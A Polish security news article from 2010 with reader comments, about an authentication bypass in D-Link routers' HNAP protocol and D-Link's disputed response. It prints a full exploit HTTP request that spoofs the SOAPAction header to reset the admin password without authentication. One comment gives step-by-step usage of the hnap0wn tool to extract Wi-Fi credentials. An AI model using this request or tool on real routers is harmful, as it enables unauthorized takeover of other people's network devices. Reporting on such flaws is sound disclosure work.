21:26
19/1/2010

Routery D-Linka podatne na atak!

D-Link potwierdził, że trzy modele jego routerów posiadają dziurę, która pozwala dostać się na urządzenie na prawach administratora. Problem w tym, że grupa specjalistów, która znalazła lukę w routerach D-Linka uważa, że błąd leży w innych urządzeniach niż te, które wskazał producent…

Dziura w Routerach D-Link

9-tego stycznia, SourceSec opublikował informację, że na routery D-Linka oznaczone jako DI-524 (C1, 3.23); DIR-628 (B2, 1.20NA, 1.22NA) oraz DIR-655 (A1, 1.30EA) można się zalogować nie znając hasła administratora.

Dziura znajduje się w implementacji protokołu Cisco HNAP (Home Network Administration Protocol) wykorzystywanego przez routery D-Linka jako jeden ze sposobów na administrowanie urządzeniem. SourceSec udostępniło narzędzie hnap0wn, korzystające z w/w luki do ataku na routery D-Linka z protokołem HNAP.

W skrócie, żądanie GetDeviceSettings nie wymaga uwierzytelnienia, ale i nie zdradza żadnych interesujących z punktu atakującego informacji. Jednakże, jeśli zespoofujemy nagłówek zapytania HNAP, wskazując jako akcje GetDeviceSettings a w treści użyjemy innej akcji, dostaniem wszystko to, o co poprosimy:

POST /HNAP1/ HTTP/1.1
Host: 192.168.0.1:8099
SOAPAction: "http://purenetworks.com/HNAP1/GetDeviceSettings"
Content-Length: 453
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<soap:Body>
<SetDeviceSettings xmlns="http://purenetworks.com/HNAP1/">
<AdminPassword>testing123</AdminPassword>
</SetDeviceSettings>
</soap:Body>
</soap:Envelope>

D-Link potwierdza, ale nie potwierdza

18-tego stycznia, D-Link potwierdził istnienie błędu w protokole HNAP wykorzystywanym w routerach DIR-855 (A2), DIR-655 (A1-A4) oraz DIR-635 (B). Jak widać, tylko jeden z wymienionych modeli pokrywa się z raportem grupy SourceSec.

D-Link w oświadczeniu napisał:

Of the three models allegedly affected, one was never sold in Europe and does not support HNAP. One does not exist and one runs a firmware version not available anywhere for download. It is important to note that running the exploit code on its own is not sufficient to hack into the router: only the software tool provided seems to achieve this result.

SourceSec nie ukrywa, że jest zaskoczony stanowiskiem prezentowanym przez D-Linka i po kolei odpiera zarzuty oraz objaśnia D-Linkowi funkcje wbudowane w ich własny sprzęt. Ale najlepszy w polemice z D-Linkiem jest fragment, komentujący opinię producenta dotyczącą tego, że kod exploita nie działa, a atak jest możliwy jedynie przy wykorzystaniu udostępnionej przez SourceSec aplikacji:

I’m confused – running the code won’t hack the router, but running the software will? It’s a bash script: the code is the software. Any piece of software that can make Web requests can be used to exploit the vulnerability. Web browser? Check. Netcat? Yup. Wget? Sure! Curl? Definitely! I’m not sure what D-Link is trying to say here.

D-Link ponoć wrzuca patche na swoje serwery. Niezależnie od tego, który model routera D-Linka posiadacie, pobawcie się hnap0wnem i sprawdźcie, czy nie ma dla Was aktualizacji ;)


Przeczytaj także:

15 komentarzy

Dodaj komentarz
  1. No ładnie ładnie. Zawsze wiedziałem, że popularność DL-524 przyniesie mi kiedyś jakieś korzyści! Haha! Dziękować Niebezpiecznikowi!

  2. Wczoraj aktualizowałem oprogramowanie routera Dir-635 – wyszła aktualizacja właśnie z powodu owej podatności HNAP. Poprzedni firmware miałem z 2008 roku a oprogramowanie uparcie twierdziło że jest to najnowsza dostępna wersja pomimo że w międzyczasie wyszło już kilka upgradów.

  3. Fajne podejście: jest dziura na kilkanaście modeli, wydajemy łatę na kilka, co do reszty twierdzimy, że nie ma problemu. D-link to moim zdaniem jedna wielka *ujnia. Model DI-524 nie współpracuje z XP-SP3, szukając rozwiązania problemu omal szału nie dostałem. Każda ze stron firmy (w różnych domenach) podaje inne, sprzeczne informacje, wg większości z nich rewizja G tego modelu w ogóle nie istnieje… a teraz to.
    Jedyne ich osiągnięcie przez ostatnie pół roku to chyba to, że strona dlink.pl zaczęła się w miarę poprawnie wyświetlać pod innymi przeglądarkami niż ta, jakiej używał projektant (a kij wie, co to było).

  4. @Jurgi:
    Co rozumiesz pod pojęciem “model DI-524 nie współpracuje z XP-SP3”. U mnie nie ma najmniejszego problemu z jego obsługą.

  5. Uściślam: chodzi o niedziałanie w praktyce WiFi „out of the box” DI-524 z XP-SP3. Problem jest stary, bo z 2008 roku ale nie raczyli go rozwiązać systemowo, informacji o przyczynach próżno szukać, na dlink.com, czy dlink.uk, gdzie odruchowo szperałem, ba, wg tych stron nie istnieje nawet rewizja G rutera, którą mam. Dopiero na polskiej stronie jest notka (pieczołowicie zakopana i broń-boże nie do znalezienia w pomocy technicznej, ani przy wyszukiwaniu modelu):

    “Jeśli po uaktualnieniu systemu Microsoft Windows XP do wersji Service Pack 3 występują problemy z działaniem adaptera bezprzewodowego D-Link, poprzez kliknięcie poniższego odnośnika pobierz sterownik pozwalający usunąć problem z zastępowaniem biblioteki .DLL D-Linka po instalacji uaktualnienia SP3.”

    Naturalnie żadnego “poniższego odnośnika” tam nie ma. Na szczęście problem rozwiązuje aktualizacja firmware, którego znalezienie to kolejne schody (patrz powyżej), na większości firmowych stron są tylko wersje starsze od załadowanej do rutera. :P Po znalezieniu jedynej nowszej problem ustaje, ale kosztem utraty kilku funkcji, jak np. regulacji siły sygnału.

    Jeśli u Ciebie działa to zapewne zawczasu załadowałeś/miałeś poprawioną wersję firmware, albo nie korzystasz z WiFi. A może masz inną rewizję, w której problem nie występuje. Ja jestem zrażony poziomem merytorycznym stron tej firmy, wykazują taki brak profesjonalizmu, że po prostu odradzam teraz ludziom tę firmę.

  6. […] Botnet Chucka Norrisa nie wchodzi na modemy z półobrotu, ale próbuje odgadnąć hasło. Jeśli ktoś chce iść w jego ślady, polecamy publicznie dostępne listy domyślnych haseł do urządzeń sieciowych. Ale silne hasło ci nie pomoże, jeśli masz router D-Linka, to Norris da sobie radę, bo potrafi skorzystać z opisywanej przez nas niedawno dziury w D-Linkach. […]

  7. no świetnie. jak to czytałem to sie cieszyłem że mam 624. ale nie ma z czego, bo prezentowane narzędzie radzi sobie lepiej z ruterem niż jego standardowe menu ://

  8. A to ciekawe co piszesz Jurgi, bo u mnie na tym routerze nie było absolutnie żadnych problemów z WiFi pod XP SP3

  9. DIR-635 Hardware Version: B1, Firmware Version: 2.33EU (niby najnowszy ze strony w UK).
    Wywołanie [i]GetDeviceSettingsi[/i] nie wyświetla hasła ale [i]GetWLanSecurity[/i] już pokazuje wszystko.

  10. […] zarządzania. Jak? Poprzez luki i błędy w ich oprogramowaniu (ostatnio opisywaliśmy taką lukę w D-Linkach). Poza tym — nie oszukujmy się, upgrade firmware’u na routerze (zwłaszcza kupionym […]

  11. Przepraszam, jestem kompletnym laikiem jeśli chodzi o kwestie związane z programowaniem, hackowaniem itd. ale lubię zaglądać na Niebezpiecznika.
    Ten artykuł mnie bardzo zaintrygował. Mam D-Link 524 ale nie wiem jak się do niego dostać poprzez to narzędzie czy inne wywoływanie [i]GetWLanSecurity[/i] i innych rzeczy. Duchów nie wywołuję i dlatego nie umiem :)
    A tak na serio czy mógłby ktoś jakoś bardziej łopatologicznie żółtodziobowi to wytłumaczyć lub podesłać jakiegoś linka?
    mój mail: ummagumma_pf@wp.pl
    Pozdrawiam serdecznie

  12. @Damian: W pierwszej kolejności musisz wypakować archiwum, następnie otwierasz sobie konsole (w linuksie) lub wiersz poleceń (w windows – start->uruchom->cmd), później już tylko wchodzisz w wierszu/konsoli do wypakowanego folderu i wpisujesz hnap0wn {adresUrzadzenia:port} {skryptDoUruchomienia} (np. hnap0wn 192.168.1.1:8099 xml/GetWLanSecurity.xml) I gotowe ;)

  13. Temat stary ale dwie sprawy:
    1. To co pisze Jurgi nie ma nic wspólnego z routerem- do wspolpracy z win xp sp3 nie są wymagane żadne biblioteki .dll więc sp3 nie może nic podmienić, być może Jurgi ma/miał kartę wifi dlinka, albo próbował konfigurować router oprogramowaniem dołączonym do routera co jest bezsensem skorpo mozna przez przeglądarkę http://www...
    2. pomimo tego iz router dir 635 (wg polskiej strony nieistniejący) wykazywal iz firmware (2.34eu04)z 2010r to ostatni dostępny soft znalazłem soft (2.23eu07) z roku 2011, po którym net po wifi zaczął chodzić jak należy a nie jak krezyżówka muła z zółwiem…
    ftp://ftp.dlink.eu/Products/dir/dir-635/driver_software/DIR-635_fw_revb_234EUb07_ALL_multi_20110314.zip

  14. […] Alternatywnie, można na router wgrać inny firmware, nie od D-Linka, a od DD-WRT lub Open WRT. W zasadzie to i tak warto się przesiąść na te firmware’y, gdyż dadzą wam one zdecydowanie więcej możliwości. Jeśli to Was nie przekonuje, to może przekona Was to, że ten backdoor to nie pierwszy problem z routerami D-Linka — już w styczniu 2010 roku można było się logować na kilka modeli D-Linka bez hasła. […]

  15. Hehehe, ostrzegam tych którzy nie zaktualizowali oprogramowania :). W Internecie grasuje wirus który odpytuje kazde IP o /HNAP1/, wiec jak tylko znajdzie Wasz (niezaktualizowany) router, zmieni hasło itd. Tak poza tym to trafiłem tutaj przeglądając log z serwera, poniżej fragment :D

    216.86.209.89 – admin [01/Feb/2014:23:05:24 +0100] “GET /HNAP1/ HTTP/1.1” 404 168 “http://[moje ip]/” “Opera/9.0 (Windows NT 5.1; U; en)”
    46.32.54.6 – admin [06/Feb/2014:18:47:09 +0100] “GET /HNAP1/ HTTP/1.1” 404 168 “http://[moje ip]/” “Opera/9.0 (Windows NT 5.1; U; en)”
    76.178.109.215 – admin [07/Feb/2014:20:03:50 +0100] “GET /HNAP1/ HTTP/1.1” 404 168 “http://[moje ip]/” “Mozilla/5.0 Galeon/1.0.2 (X11; Linux i686; U;) Gecko/20011224”

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: